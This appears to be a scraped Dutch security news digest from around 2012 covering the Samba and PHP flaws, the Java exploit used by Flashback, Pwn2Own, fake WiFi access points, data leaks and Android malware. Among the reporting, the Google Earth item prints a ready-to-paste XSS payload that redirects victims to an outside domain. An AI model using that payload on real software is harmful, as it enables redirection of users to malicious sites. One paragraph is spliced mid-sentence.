    Volgens de website Whitec0de is er veelvuldig misbruik gemaakt van het lek in de twee weken tussen de ontdekking en de fix. De hacker die de fout ontdekte zou de Firefox add-on Tamper Data gebruikt hebben.

    Microsoft heeft via Twitter bevestigd dat het op de hoogte is van het lek en dat die inmiddels gedicht is. "Op vrijdag hebben we een incident met betrekking tot de reset-functie aangepakt om Hotmail-klaten te helpen beschermen, geen actie nodig", aldus het bedrijf.

    Bron: nu.nl

  • httpDoor het aanpassen van de informatie die de browser tijdens het surfen naar websites stuurt, kan een besmette computer voorkomen worden, ook al wordt er met verouderde software gesurft. Het gaat om de informatie die in de HTTP-header aanwezig is. "De meeste gekaapte websites die voor Blackhat SEO worden gebruikt, controleren de Referer header en User-Agent om te bepalen of de bezoeker naar een onschuldige spampagina of naar een kwaadaardig domein wordt doorgestuurd", zegt Julien Sobrier van Zscaler Research. 
    Bij Blackhat Search Engine Optimization (SEO) proberen cybercriminelen de gehackte pagina's zo hoog mogelijk in de index van zoekmachines te krijgen. Dat vergroot de kans dat internetgebruikers op een link klikken die naar een kwaadaardige website leidt. Deze kwaadaardige website bevat een exploit die ongepatchte software bij de bezoeker misbruikt om automatisch malware te installeren. 

    Google Chrome
    Door het aanpassen van de twee eerder genoemde headers, denkt de gehackte website dat de bezoeker geen echte gebruiker is en stuurt die daarom niet naar de kwaadaardige content door. Zscaler Research ontwikkelde hiervoor de Search Engine Security Firefox plug-in, die de header bij het verlaten van verschillende zoekmachines aanpast. 

    Onlangs stelde Google programmacode beschikbaar waarmee het ook mogelijk is om de HTTP-header van Google Chrome aan te passen. De plug-in werkt daardoor nu ook op Google's browser en is via de Chrome Web Store te downloaden.

    bron: security.nl

  • sambaSamba is een award-winnende gratis software file-, print-en authenticatie-server suite voor Windows-clients. Het project werd gestart door de Australische Andrew Tridgell.

    Er is een ernstige kwetsbaarheid in de Samba open-source software ontdekt, die een aanvaller kan misbruiken om root rechten te krijgen, zonder enige vorm van authenticatie. De bug is in alle versies van Samba van 3.0.x naar 3.6.3 te vinden, maar is vastgesteld in Samba 3.6.4 (laatste stabiele release).

    De kwetsbaarheid werd ontdekt door security-onderzoeker Brian Gorenc en een niet nader genoemde collega, die voor de Zero Day Initiative werkt. De fout, die zich in de code generator voor remote procedure call Samba's (RPC)-interface bevindt, maakt het mogelijk voor hackers om willekeurige code op de samba server uit te voeren.

    Drie nieuwe security releases (Samba 3.4.16, Samba 3.5.14, Samba 3.6.4) voor de momenteel ondersteunde versies worden besproken op samba.org / samba / security . Patches tegen oudere Samba-versies zijn beschikbaar op samba.org / samba / patches.

    Het grootste risico lopen de Linux-embedded systemen die gebruik maken van Samba. Veel van deze apparaat leveranciers patchen niet regelmatig hun systemen. Dit maakt dit beveiligingslek een aantrekkelijk doelwit voor exploit schrijvers, zowel voor de integratie in commerciële en gratis penetration testing tools zoals Metasploit, maar ook voor gebruik in kwaadaardige aanvallen!

  • Joomscan Security Team Web-Center just released an updated for Joomscan Security Scanner. The new database Have vulnarbilities 623. Joomla! is probably the most widely-used CMS out there due to its flexibility, user friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. Check for new updates with command: ./joomscan.pl or check ./joomscan.pl update . A regularly-updated signature-based scanner that can detect file inclusion, sql injection, command execution, XSS, DOS, directory traversal vulnerabilities of a target Joomla! web site.

    Source: thehackernews.com

  • java-securityCybercriminelen gebruiken een lek in Java waarvoor nog geen beveiligingsupdate beschikbaar is om Mac-computers met malware te infecteren. Het gaat om CVE-2012-0507, waar halverwege februari een update voor de Windows-versie verscheen. Apple heeft nog altijd geen update uitgebracht, waardoor het volgens anti-virusbedrijven slechts een kwestie van tijd was voordat aanvallers zouden toeslaan. 
    "We hebben hier al een tijdje rekening mee gehouden", zegt Brod van het Finse F-Secure. De exploit voor het Java-lek is inmiddels aan de Blackhole exploit-kit gebruikt en wordt actief door de bende achter de Flashback Trojan gebruikt voor het infecteren van Mac-computers met malware. 

    Alleen het bezoeken van een kwaadaardige of gehackte website is in dit geval voldoende. Bij de recente hack van NU.nl werd ook een Java-lek door de aanvallers misbruikt. 

    Exploit
    Brod merkt op dat er ook geruchten de ronde doen dat er een zero-day exploit wordt aangeboden voor een nog onbekend lek in Java. Dat zou betekenen dat alle computers met Java risico lopen. "Als je Java nog niet hebt uitgeschakeld, doe dit dan voordat het echt een uitbraak wordt", aldus de analist. 

    Uit eerder onderzoek bleek dat Java-updates tergend langzaam door gebruikers worden geïnstalleerd. Na een maand beschikte slechts tien procent van de Java-gebruikers over de meest recente versie.

    Bron: Security.nl

  • java-securityEr is een uitbreiding voor een populaire hackertool verschenen waarmee het mogelijk is om Linux, Mac en Windows-systemen over te nemen, zolang het slachtoffer niet over de meest recente Java-versie beschikt. Iedereen die Java-kwetsbaarheid CVE-2012-0507 niet heeft gepatcht, waar halverwege februari een update voor verscheen, loopt risico. Gisteren werd bekend dat waarschijnlijk bij 80% van alle Java-gebruikers deze update ontbreekt. 
    De ontwikkelaars van Metasploit, een populaire tool voor het testen van de veiligheid van systemen en netwerken, ontvingen een malware-exemplaar dat zich via het Java-lek verspreidt. Aan de hand van deze informatie is nu een module ontwikkeld waardoor Metasploit-gebruikers ook Java-gebruikers kunnen aanvallen. 

    Platformen
    "Zoals Microsoft al suggereerde zou de exploit op verschillende systemen betrouwbaar moeten werken", aldus de Metasploit-ontwikkelaars. "We hebben de exploit op verschillende platformen getest, van Windows XP, Windows 7 tot Ubuntu en Mac OS X. Zolang het slachtoffer een kwetsbare Java-versie gebruikt, zou je shell op zijn systeem moeten krijgen." 

    Om de aanval uit te voeren volstaat het bezoeken van een kwaadaardige of gehackte pagina. Wie Java nog gebruikt krijgt het advies de laatste update via Java.com te downloaden. Is de software niet voor dagelijks gebruik vereist, dan wordt geadviseerd die te verwijderen.

    bron: security.nl

  • Single Sign On-knoppen op websites

    Kwaadwillenden konden accounts kraken als ingelogd kon worden via Google en Facebook. De implementatie van die 'single sign on'-logins bleek vaak gebrekkig, waardoor het token dat Google en Facebook sturen onderschept kon worden.

    Ook kon de accountinformatie van de gebruiker worden bewerkt als die naar servers van Google en Facebook wordt verstuurd, schrijft Ars Technica op basis van onderzoek van enkele wetenschappers van de Amerikaanse University van Indiana en Microsoft Research.

    De kwetsbaarheden die de onderzoekers hebben gevonden, zijn allemaal gerepareerd, zo schrijven de onderzoekers in hun paper. Dat betekent niet dat deze Single Sign On-loginprocedures nu veilig zijn, waarschuwen de onderzoekers. "Wij geloven dat gezien onze onderzoeksresultaten andere webdiensten met Single Sign On-procedures ook kwetsbaar kunnen zijn." De kwetsbaarheden werden niet alleen gevonden bij diensten, waarop gebruikers kunnen inloggen via Google of Facebook, maar ook bij OpenID.

    Vanwege die gebrekkige implementatie, konden kwaadwillenden het token onderscheppen waaruit de dienst kan opmaken dat de gebruiker de juiste gebruikersnaam met wachtwoord heeft ingevoerd voor Google of Facebook. Daardoor had een kwaadwillende toegang tot het account van een gebruiker zonder een gebruikersnaam of wachtwoord in te hoeven vullen.

    De kwetsbaarheden zaten zowel bij de implementatie van de logins op websites van derden als bij Google, Facebook en OpenID. Ook bleken bepaalde browsertechnieken de kwetsbaarheid te verhogen. Goede implementaties van Single Sign On bleken bijvoorbeeld onveilig te worden als ze werden uitgevoerd in Adobe Flash, aldus de onderzoekers.

    Single Sign On stelt gebruikers in staat bij een dienst in te loggen met de gebruikersnaam en het wachtwoord van een andere dienst, bijvoorbeeld Gmail of Facebook. Dat verloopt via een api, die regelt dat de dienst aan Google of Facebook vraagt of de 'credentials' juist zijn, waarna de gebruiker een token ontvangt dat wordt gebruikt om in te loggen. Veel sites werken met deze Single Sign On-procedure.

    Bron: Tweakers.net

  • Google Earth
    Ucha Gobejishvili, Security-onderzoeker die ook bekend staat als Longrifle0x , heeft een gat in Google Earth gevonden. Hij vond dit kritieke beveiligingslek in de  Google Earth software client. 

    Voor een Proof of Concept, kan je elke versie Google Earth downloaden. Open daarna "Klik Placemark", en voeg de 'kwaadaardige' code (zoals hieronder staat) toe. 

    <A Href="javascript:document.location= 'http://www.anydomein.com/'">XSS</A><marquee>Amsterdam</marquee>"

  • wifi-hack

    Snelheidsbeperkingen en datalimieten van telco's leiden gebruikers naar openbare WiFi-netwerken. Maar pas op: nepnetwerken luisteren logins af. Hoe val je niet voor malafide WiFi.

    Enerzijds zijn draadloze verbindingen via lokale draadloze netwerken een uitkomst. Anderzijds vormen ze een risico. Het gevaar van WiFi-netwerken van onbekende derden is niet nieuw, maar wel groeiende. Dat komt mede door het groeiende aantal gebruikers dat een snelle, mobiele internetverbinding zoekt. Bijvoorbeeld op Schiphol, of op andere locaties met een hoge dichtheid aan smartphone- en tabletgebruikers. Zoals het festival SXSW (South by south west).

    Praktijkdemonstratie
    Op die jaarlijkse conferentie voor en over interactieve content, muziek en film, zijn dit jaar vele draadloze verbindingen van gebruikers onderschept. Een van de sprekers bewees daarmee in de praktijk zijn punt over het risico van WiFi. De onderschepping werd gedaan met een namaak WiFi access point, waarmee al het draadloze verkeer kan worden afgeluisterd. Spreker Darren Kitchen heeft zijn 'slachtoffers' echter slechts omgeleid, naar de beroemde Nyan Cat-animatie.

    Vele SXSW-bezoekers kregen dus niet hun Foursquare check-in, hun Twitter-feed, hun mail-account of hun VPN-verbinding met het bedrijfsnetwerk voorgeschoteld. Ook simpel websurfen leverde de vliegende cartoon-kat op.

    Geen besef
    "Tijdens de demo was de helft van mijn publiek verbonden met mijn WiFi router", vertelt hacker Kitchen aan ict-nieuwssite Cnet. "Niemand hier heeft ook maar enig besef van security." Dat gebrek aan besef geldt niet alleen voor bezoekers van dit multimediafestival in Texas, maar in de brede zin voor gewone consumenten die steeds meer mobiel zijn en meer mobiel doen.

    Smartphones en tablets bevatten steeds meer gevoelige log-ins voor waardevolle online-diensten. Een eenvoudig op te zetten nep-WiFi access point kan de log-ins en het internetverkeer zó onderscheppen. Het gaat dan wel om open WiFi-netwerken.

    'Goedgelovige' apparaten
    Bijkomend probleem is dat de draadloze apparaten 'goedgelovig' zijn. Na een eenmaal gelegde verbinding met een WiFi-router, goedgekeurd door gebruiker, wordt die onthouden door smartphones, tablets en laptops. Als deze apparaten dat netwerk opnieuw tegenkomen, maken ze weer automatisch verbinding. Dat gebeurt ook als het een andere router is, maar met dezelfde netwerknaam (SSID). Denk aan 'KPN Hotspot', 'Linksys default' en dergelijke standaardnamen die op veel verschillende plekken voorkomen.

    Soms heeft zo'n openbaar netwerk nog wel een eigen inlog-pagina vóór de gewenste internettoegang, maar de WiFi-connectie is dan al wel gemaakt. Dit betekent dus ook automatische verbinding met een nep-WiFi-router die sluw de naam heeft van een veelgebruikt open WiFi-netwerk. Zoals 'attwifi' voor de social media-guru's op SXSW.

    Huis-, tuin- en keukensnifferSpreker Darren Kitchen waarschuwt niet alleen voor dit gevaar, hij levert het ook. Via zijn site Hak5.org verkoopt hij de Wifi Pineapple Mark IV: een compleet draadloos access point maar dan uitgerust met afluistertools. Deze goedkope nep-WiFi-router heeft twee Ethernet-verbindingen, aansluitmogelijkheden voor een 3G- en 4G-modem en is op afstand uit te lezen. Het afluisteren gebeurt dus ook draadloos, terwijl het omgeleide verkeer gewoon wordt doorgesluisd naar de eigenlijke bestemming, zodat de slachtoffers niets in de gaten hebben.

    De Pineapple is niet alleen verkrijgbaar als verdacht zwart kastje met Jasager-sticker (The Yes Man), maar ook als anoniem aluminium doosje met magneten om de WiFi-onderschepper ongezien ergens op te hangen. Die stiekeme uitvoering heeft een ingebouwde batterij die het 30 uur uithoudt. Bovendien is Kitchens Pineapple lang niet het enige verkrijgbare apparaat dat dit kan.

    TegenmaatregelenWat te doen tegen dit onzichtbare gevaar? Eindgebruikers kunnen zichzelf wel degelijk beschermen. Afhankelijk van hun technisch inzicht zijn er opeenvolgende stappen. De simpelste bescherming is gelijk de meest radicale: gebruik geen WiFi, schakel het echt uit in het mobiele apparaat. Een meer praktische bescherming is het bewust niet gebruiken van open WiFi-netwerken, ook niet als die vertrouwd lijken te zijn.

    Een volgende tegenmaatregel is het beveiligen van het eigen draadloze netwerkverkeer, via een VPN (virtual private network) of door alleen SSL-verbindingen te leggen. Daarmee zijn open WiFi-netwerken wel met enige mate van veiligheid te gebruiken.

    WiFi-hacker Kitchen waarschuwt en demonstreert op SXSW echter dat VPN-verbindingen zijn te frustreren met vervalste WiFi-frames. Het uitvallen van de beveiligde verbinding kan gebruikers ertoe aanzetten om 'dan maar zonder' te doen, waarmee ze direct weer af te luisteren zijn. Een maatregel ter WiFi-bescherming die hoe dan ook aanbeveling verdient, is het niet laten onthouden van eerdere veilige gebruikte - of veilig geachte - draadloze netwerken.

    In kaart brengen
    Techsite Cnet noemt nog een optimistische beschermingsoptie: leveranciers een voorziening laten bieden die WiFi-netwerken controleert op bijvoorbeeld geolocatie. Daarvoor is dan wel een internetverbinding nodig, bijvoorbeeld via 3G, naast een industriebrede samenwerking en massale indexering van WiFi-routers. Dat laatste is al wel in uitvoering, door bijvoorbeeld Google met zijn Street View-auto's en ook Android-smartphones, maar ook door een gespecialiseerd locatiebedrijf als Skyhook.

    Bron: webwereld.nl

  • blackhatVandaag begint in Amsterdam de beruchte securitybijeenkomst Black Hat. 5 l33t hacks en tools die daar aan bod komen.

    Hackersconferentie Black Hat levert vaak vuurwerk op. Voor crackers, security-experts en it-beheerders. De Amsterdamse editie van dit jaar belooft ook veel nuttige hacks én tools. Die zijn lang niet alleen geschikt voor kwaadwillenden, maar bieden beschermers van it-systemen hulp. Soms niet eens indirect, maar juist als enige doel. Een greep uit het Black Hat-aanbod.

    Pastebin-alarm
    Zo presenteert de Belgische security consultant Xavier Mertens zijn tool Pastemon. Daarmee kan de door crackers veelgebruikte 'dumpsite' Pastebin in de gaten worden gehouden. Dat doet de PDF-bescherming

    Sprekers Didier Stevens en Jose Miguel Esparza belichten elk het risico van PDF-documenten en bieden middelen om die bestanden door te lichten. Door Stevens gemaakte PDF-analysetools zijn ook opgenomen in Linux-distributies als BackTrack en REMnux. Zijn tool PDFiD draait ook mee in het arsenaal van de online-virusscanner VirusTotal.

    Esparza heeft met zijn peeppdf een soortgelijke röntgentool gemaakt, in Python.

    Slimmere kwetsbaarhedenscan
    De Nederlandse security-expert Frank Breedijk praat op Black Hat over zijn scantool Seccubus. Die software neemt it-omgevingen door op zwakke plekken, maar presenteert de bevindingen op een efficiëntere manier dan scantools als Nessus en OpenVAS, claimt de maker.

    Webapps pwnen
    Student Tom Forbes neemt webapplicaties onder vuur met tool Xcat. Dit command line programma benut kwetsbaarheden in xml-technologie Xpath en biedt de gebruiker meteen geavanceerde functies voor het exploiten daarvan. Aanvallers kunnen zo complete xml-databases van webapplicaties leegtrekken. Xcat ondersteunt zowel Xpath 1.0 als de verbeterde versie 2.0.

    CAPTCHA's kraken met OCR
    Veel websites vertrouwen op CAPTCHA's (completely automated public Turingtest to tell computers and humans apart) om inloggen door bijvoorbeeld spambots te voorkomen. De hiervoor gebruikte 'vertroebelde' plaatjes bevatten tekens die een gebruiker moet invoeren om te kunnen inloggen. Deze tekens zijn voor een mens wel leesbaar, maar leiden een computer om de tuin.

    Tenminste, dat is de theorie. Security-consultant Gursev Singh Kalra van McAfee-dochter Foundstone heeft CAPTCHA's in de praktijk onderzocht bij 200 drukbezochte websites en bij diverse grote CAPTCHA-providers. Hij stelt dat een alarmerend aantal van deze visuele CAPTHA's valt te kraken met een combinatie van goede beeldverwerking vooraf en optische karakterherkenning (OCR).

    Om dit ook praktisch te bewijzen, heeft Kalra zijn tool TesserCap gemaakt om deze Turing-tests voor spambots te stress-testen.TesserCap heeft een grafische interface en haalt de CAPTCHA's van een doelsite op om die lokaal op te slaan en dan op te lossen. 

    Lees meer op webwereld.nl

  • XSSPaypal

    Vansh en Vaibhuv zijn twee Indiase Hacker die een XSS kwetsbaarheid in de Paypal site hebben ontdekt. De XSS kwetsbaarheid leidt tot niet te valideren input. Men kan willekeurige javascript toevoegen zonder dat dit gefiltert wordt.

    Dit is een ernstige beveiligingsprobleem, maar geeft de aanvaller in geen enkele manier direct toegang tot de server. Wel is het voor een kwaadwillende aanvallers mogelijk de controle tussen een gebruiker en een website te verkrijgen. Voor de aanvaller is het mogelijk om een paypal gebruiker een aangepaste pagina voor te schotelen. De links op deze pagina kunnen dan weer naar gecomprimenteerde sites verwijzen!

    Meer over XSS

  • firefoxOok Firefox is tijdens de hackerwedstrijd Pwn2Own gekraakt, wat betekent dat Safari de enige niet gehackte browser is. En dat is opmerkelijk, aangezien bij vorige edities Apple's browser meestal als eerste sneuvelde. De Firefox-hack kwam op naam van Vincenzo 'Snagg' Lozzo en Willem 'Dvorak' Pinckaers. Net als bij de hacks van Chrome en IE9, werd ook in dit geval de ASLR- en DEP-beveiliging van Windows 7 omzeild. In tegenstelling tot Chrome en IE9 beschikt Firefox niet over een sandbox, waardoor het een eenvoudiger doelwit voor de hackers was. 


    "We hebben het lek drie keer gebruikt. We gebruikten het eerst om informatie te lekken en daarna weer om adressen van onze data te lekken. Uiteindelijk gebruikten we weer hetzelfde lek om code uit te voeren", aldus Pinckaers. Hij was naar eigen zeggen een dag bezig met het schrijven van de exploit, nadat Lozzo hem de kwetsbaarheid had gegeven. 

    Wedstrijd
    Met de hack verdienen de twee onderzoekers 30.000 dollar. Het Franse beveiligingsbedrijf VUPEN, dat zowel Google Chrome als Internet Explorer 9 wist te hacken, ging er met de hoofdprijs van 60.000 dollar vandoor. Dit jaar werd er met een puntensysteem gewerkt, waarbij deelnemers voor elke hack punten konden verdienen. 

    De hoofdprijs was voor degene die na het drie dagen durende evenement de meeste punten had. De nieuwe opzet was ook de reden dat Mac-hacker Charlie Miller dit jaar niet meedeed, waardoor Safari Pwn2Own voor de verandering eens overleefde.

    Bron: security.nl
  • pwn2ownEen Frans hackersteam heeft bij een gerichte aanval Googles Chrome-browser als eerste weten te hacken bij de bekende Pwn2Own-wedstrijd. Vorig jaar bleef Chrome overeind en de Fransen wilden aantonen dat geen applicatie onkraakbaar is.

    De Fransen slaagden erin een exploit binnen Chrome te openen via een speciale website die ervoor zorgde dat de calculator-app van Windows geopend werd. Daarmee werd de sandbox van de browser omzeild. De hack vond plaats op een volledig gepatchte Windows 7 SP1-machine en de Fransen werkten zes weken aan het vinden van de kwetsbaarheden en het schrijven van de exploits. Het team omzeilde naast de Chrome-sandbox onder andere de data execution prevention en address space layout randomization in Windows.

    Het team wint 32 punten voor de competitie en maakt kans op de hoofdprijs van 60.000 dollar en nog eens 60.000 dollar die Google apart beschikbaar heeft gesteld voor een volledige hack van Chrome. Of de Fransen in aanmerking komen voor deze laatste beloning is echter onduidelijk.

    Google verklaarde eerder de Pwn2Own-wedstrijd niet meer te sponsoren, aangezien de reglementen niet vereisen dat de deelnemers details van hun exploit openbaren. Google houdt daarom tegelijkertijd in Canada zijn eigen Pwnium-initiatief, waarbij het wel details eist. Pwn2Own wordt georganiseerd door HP Tippingpoint Zero Day Initiative. De organisatie verklaarde dat deelnemers alleen een hack hoeven te demonstreren, waarna HP Tippingpoint de kwetsbaarheden kan blokkeren in zijn security-applicaties voor de enterprisemarkt.

    De kans dat de Fransen hun hack publiek maken is echter klein. Het controversiële bedrijf Vupen, dat exploits verkoopt aan overheidsklanten, zit er namelijk achter. Vupen verklaarde tegen ZDNet de rechten op de zero-day-kwetsbaarheden te verkopen en de sandbox-omzeiling voor zichzelf te houden. Overigens complimenteerde Chaouki Bekrar Google met de beveiliging van Chrome, die volgens hem de veiligste sandbox heeft. Ook voor de andere browsers heeft Vupen exploits, maar het bedrijf besloot eerst Chrome aan te vallen.

    bron: tweakers.net

  • plesk-logoEen ernstig lek in de Plesk beheerderspaneelsoftware wordt actief misbruikt om Plesk servers over te nemen, zo waarschuwt ontwikkelaar Parallels. Via Plesk is het mogelijk voor beheerders, webmasters en hostingbedrijven om FTP en e-mailaccounts aan te maken en andere zaken met betrekking tot hosting-accounts regelen. Een anonieme aanvaller kan via SQL Injection de Plesk server compromitteren, zonder dat hier enige authenticatie voor nodig is. De kwetsbaarheid is aanwezig in Plesk Panel versies 7.6.1 tot 10.3.1 
    Parallels product manager Tyra Blake laat weten dat een update voor het kwetsbare bestand al in september beschikbaar was, maar volgens sommige klanten werd de e-mail die voor het lek waarschuwt pas op 10 februari verstuurd. 

    Misbruik
    Beheerders krijgen het advies om de update te installeren en te controleren of er geen misbruik van het kwetsbare bestand is gemaakt. Anders zouden aanvallers die eerder wisten binnen te komen, nog steeds toegang tot het systeem hebben, ook al is de update geïnstalleerd. Daarnaast zou ook van alle klanten het wachtwoord moeten worden gereset. 

    Plesk wordt door tal van hostingbedrijven, maar ook allerlei overheidssites gebruikt.

  • security-computer-doctorVijf Amerikaanse ziekenhuizen hebben de dossiers van meer dan 30.000 patiënten een jaar lang via de zoekmachines van Google en Yahoo op het internet gelekt. Door een verkeerde beveiligingsinstelling werd de informatie door de zoekmachines geïndexeerd. Het gaat om namen, body-mass index (BMI), bloeddruk, laboratoriumonderzoeken, of de patiënt rookte of niet, medische allergieën, wilsverklaring en demografische informatie. De gegevens werden begin 2011 voor het eerst geïndexeerd. 

    Zoektermen
    Om de informatie te vinden zou er volgens ziekenhuis CIO Clyde Wesp een "complexe verzameling van termen" moeten worden gebruikt. De ziekenhuizen ontdekten het lek nadat ze door de advocaat van een patiënt werden gewaarschuwd. Hoe de patiënt zijn gegevens op het web ontdekte is onbekend. Alle overige patiënten werden via de post ingelicht. 

    De gegevens zijn inmiddels niet meer online te vinden. "Ik denk dat het belangrijkst is dat we snel hebben gereageerd", aldus Wesp.

    bron: Security.nl

  • defensieEen standaard wachtwoord zorgde ervoor dat de videoconferentiesystemen van Defensie voor iedereen toegankelijk waren. Dat ontdekte beveiligingsblogger Rickey Gevers na een tip van Twitteraar Antisec. Daarnaast was het systeem ook niet tegen brute force-aanvallen beschermd. "In dit geval kunnen we stellen dat vrijwel alle routers in Nederland -dus ook die bij u thuis- beter beveiligd zijn. Want die is namelijk vrijwel altijd geheel niet toegankelijk via het internet", aldus Gevers. 

    Het IP-adres dat hij van Antisec kreeg doorgespeeld kwam uit op het videoconferentiesysteem van de directeur van het Marinebedrijf CDRT. Daar vandaan werden IP-adressen en telefoonnummers van verschillende andere Defensiesystemen ontdekt. 

    "Het is zo goed als uitgesloten dat iemand dit voor de lol in elkaar heeft geknutseld. 4 sites geven een login mogelijkheid, en ook deze sites hangen dus blijkbaar aan het internet. De sites geven daarbij keurig weer welke software er achter draait, en in alle gevallen was dit inderdaad videoconference software", stelt Gevers. 

    Onderhoudsbedrijf
    Volgens een woordvoerder van Defensie worden de systemen zelden gebruikt. "Een onderhoudsbedrijf van Defensie heeft ooit zeven vtc-systemen aangeschaft voor zichzelf. Deze systemen draaien op het reguliere, publieke internet. De cyber-veiligheidsafdeling van Defensie waarschuwt tegen dergelijke systemen, omdat die makkelijk gehackt kunnen worden. En dat blijkt. Defensie betreurt het dat met dit voorval de schijn van onveiligheid kan zijn gewekt, maar we benadrukken dat het eigen netwerk nooit in gevaar is geweest." 

    my contacts
    bron:  security.nl

  •  

    pirate-keyboardAanvallers zijn erin geslaagd om de server van klokkenluidersite Cryptome te hacken en daar malware op te plaatsen. Het zou gaan om de Blackhole exploit-kit, die bezoekers met ongepatchte software automatisch infecteert. Dit programma misbruikt vooral lekken in Adobe Reader, Java en Flash Player. Cryptome maakte de infectie op de eigen website bekend

    Uit de loggegevens zou blijken dat de malware vier dagen op de website heeft gedraaid, voordat een bezoeker alarm sloeg. Verder onderzoeks wees uit dat de kwaadaardige code op 6.000 HTML-pagina's van de website was geplaatst. Inmiddels zijn alle besmette pagina's door schone bestanden vervangen, hoewel de klokkenluidersite niet uitsluit dat er nog directories zijn waar de malware actief is.

     

    bron: security.nl

  • Philips Electronics got hacked Database Stolen by Hackers
    Een webserver van elektronicagigant Philips is gehackt, waarbij een database met persoonsgegevens is gestolen en vervolgens online gezet. De aanval werd uitgevoerd door 'bch195' en 'HaxOr', die lid zijn van een groep die zich Team INTRA noemt. Op Pastebin.com werd de aanval aangekondigd en verschillende links geplaatst. Het gaat onder andere om een screenshot van verschillende Philips-sites en subdomeinen die op de server draaiden. 

    Datadiefstal
    Tevens staan er links naar informatie die in de database werd gevonden. Het lijkt om gegevens van klanten te gaan die iets in een webshop hebben aangeschaft en een overzicht van Philips-personeel. In de lijst staat ook het privé e-mailadres van Kees Schep, Vice President Innovation en Development bij Philips Consumer Lifestyle. 

    Als laatste plaatsten de aanvallers een link met een overzicht van 100 e-mailadressen. De totale lijst zou uit 200.000 e-mailadressen bestaan, maar die willen de aanvallers niet openbaren, aangezien ze van plan zijn om die te verkopen. Waar deze e-mailadressen precies vandaan komen is onduidelijk.

  • google walletHet blijkt kinderlijk eenvoudig om toegang te krijgen tot een account van Googles mobiele betaaldienst Wallet. Door de data die in de app is opgeslagen weg te gooien wordt om een nieuwe pincode gevraagd, waardoor een hack niet nodig is.

    De applicatiedata kan gemakkelijk weggegooid worden door naar de instellingen van het Android-apparaat te gaan. Wanneer een kwaadwillende dan een prepaid betaalkaart van Google met Wallet koppelt, wordt er toegang verkregen tot het geld dat de gebruiker al via prepaid op zijn telefoon had gezet. Omdat prepaidtegoed gekoppeld is aan de telefoon en niet aan een account, blijft het geld beschikbaar ondanks het resetten van de applicatiedata.

    Google raadt Wallet-gebruikers die hun telefoon hebben verloren aan om te bellen met de klantenservice om de prepaidkaarten die het bedrijf aanbiedt te laten blokkeren. Daardoor zou de truc niet meer werken. Er wordt gewerkt aan een software-update die volgens de internetgigant snel wordt uitgerold.

    Kortgeleden kwam Wallet al in het nieuws doordat een beveiligingsbedrijf er in was geslaagd de pincode te achterhalen. Er werd daarbij een brute force-aanval gebruikt om hashes van de pincode uit te lezen. Deze techniek bleek alleen te werken op Android-toestellen die roottoegang hebben, waardoor de impact beperkt blijft. De nieuwere methode is echter een stuk simpeler en werkt bij alle gebruikers van Wallet. Wel moeten kwaadwillenden het Android-apparaat van de Wallet-gebruiker in handen hebben en toegang tot het toestel hebben.

    Bron: tweakers.net

  • Android Bmaster Exploits

    A new piece of Android malware named Android.Bmaster, first highlighted by researcher Xuxian Jiang at North Carolina State University, was uncovered on a third-party marketplace and is bundled with a legitimate application for configuring phone settings, Symantec researcher Cathal Mullaney wrote in a blog.

    This Malware is estimated to affect between 10,000 and 30,000 phones on any given day. The malware, mostly found on Chinese phones, works by using GingerBreak, a tool that gives users root access to Android 2.3 Gingerbread. RootSmart is designed to escape detection by being named "com.google.android.smart," which the same name as a settings app included by default with Android operating systems.

    Mullaney explained that once the malware is installed on the Android phone, an outbound connection from the infected phone to a remote server is generated.“The malware posts some user and phone-specific data to the remote address and attempts to download and run an APK file from the server. The downloaded file is the second stage in the malware and is a Remote Administration Tool (RAT) for Android, detected as Android.Bmaster. This type of malware is used to remotely control a device by issuing commands from a remote server”.

    To counter the rising tide of threats, Google last week announced it had launched an app prescreening tool called Bouncer that runs a server-based simulation to check apps for malicious behavior such as attempts to access or send personal data, or simply send out pricey text messages. Google blocks them before they get into the official Android Market.Bouncer has been used quietly for several months; in the second half of 2011, the Android market saw a 40 percent decrease in malware apps identified as potentially malicious, compared to the first half of the year.

    Google spokesperson Nancarrow points out that Rootsmart wasn’t found in the official Android Market and so falls outside the zone of protection that Google is trying to enforce with its new malware scanner. And the fact that Gingerbreak was already patched, he adds, points to Android’s “defense in depth approach, not a reliance on any specific user protection measure."

    Source: thehackernews.com

  •  

    XSS


    Today Ucha Gobejishvili ( longrifle0x ) a Pentester from Georgia reported 3 More important Cross Site Scripting Vulnerabilities in Sun Microsystem's and Java Printer Webpages.

    Java's Vulnerable Link   : Click Here
    Sun's Vulnerable Link 1 : Click Here
    Sun's Vulnerable Link 2 : Click Here
     
    Cross-Site Scripting occurs when an attacker can send a malicious script to a different user by relaying the script from an otherwise trusted or innocuous server. These flaws are extensive on the Web and allow an attacker to place malicious code that can execute attacks against other users in the security context of the web servers of the trusted host.


    Source: thehackersnews.com

     

  •  

    php2De zeer populaire scripttaal PHP heeft een nieuwe versie uitgebracht die een ernstig beveiligingslek verhelpt, waardoor aanvallers op afstand willekeurige code konden uitvoeren. PHP zou door 77% van alle websites worden gebruikt en draait zodoende op tal van webservers, die nu risico lopen. De kwetsbaarheid werd ontdekt door beveiligingsonderzoeker Stefan Esser

    Ironisch
    De kwetsbaarheid werd geïntroduceerd door door de patch voor het hash-collision-lek dat in december werd gemeld en januari gepatcht. Via de hash-collision-kwetsbaarheid was het mogelijk voor aanvallers om webservers vanaf één laptop plat te leggen. 

    Het feit dat een beveiligingsupdate een beveiligingslek veroorzaakt is erg ironisch,aldus Dustin Schultz. Inmiddels is er ook een proof-of-concept exploit verschenen. Gebruikers wordt dan ook geadviseerd om zo snel als mogelijk PHP 5.3.10 te installeren.

     

  • boardroom2Inleiding
    Samengevat is een groot deel van video-conferencing apparatuur die is aangesloten op het internet zonder firewall en geconfigureerd om automatisch inkomende video-oproepen te accepteren. Hierdoor kan een indringer op afstand zowel audio-als video-informatie monitoren, vaak met weinig tot geen notificatie van het doel. 

    Uit onderzoek onder ongeveer 3% van het adresseerbare internet en richt zich op apparatuur die het H.323-protocol support. Van de 250.000 genoemde systemen, zijn er net iets minder dan 5000 geconfigureerd tot het automatisch ontvangen van inkomende gesprekken. Er zijn naar schatting 150.000 van deze 'open' systemen op het internet. Dit is exclusief de honderdduizenden video-conferencing systemen van grote bedrijven die blootgesteld zijn in de interne netwerken!

    H.323 Discovery
